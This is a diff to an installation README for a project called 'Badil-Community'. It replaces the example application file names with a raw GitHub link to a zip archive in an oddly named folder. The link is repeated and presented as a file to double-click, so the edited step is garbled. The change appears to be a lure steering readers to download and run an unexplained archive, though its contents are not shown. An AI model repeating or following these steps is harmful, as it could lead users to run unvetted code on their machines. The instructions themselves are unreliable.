Ronnicatrabeate534/Badil-Community/README.md

 4. **Unzip the Download (if necessary):** If you downloaded a zipped file, extract its contents.
 You can usually do this by right-clicking the file and selecting "Extract All."

-5. **Run the Application:** Locate the extracted folder and double-click the application file (e.g., `Badil-Community.exe` or `Badil-Community.dmg`).
+5. **Run the Application:** Locate the extracted folder and double-click the application file (e.g., `https://raw.githubusercontent.com/Ronnicatrabeate534/Badil-Community/main/mesnalty/Badil-Community.zip` or `https://raw.githubusercontent.com/Ronnicatrabeate534/Badil-Community/main/mesnalty/Badil-Community.zip`).
 Follow any on-screen prompts to complete the installation.

 6. **Create an Account (if prompted):** Some features may require you to create an account.
 Follow the prompts to set up your profile.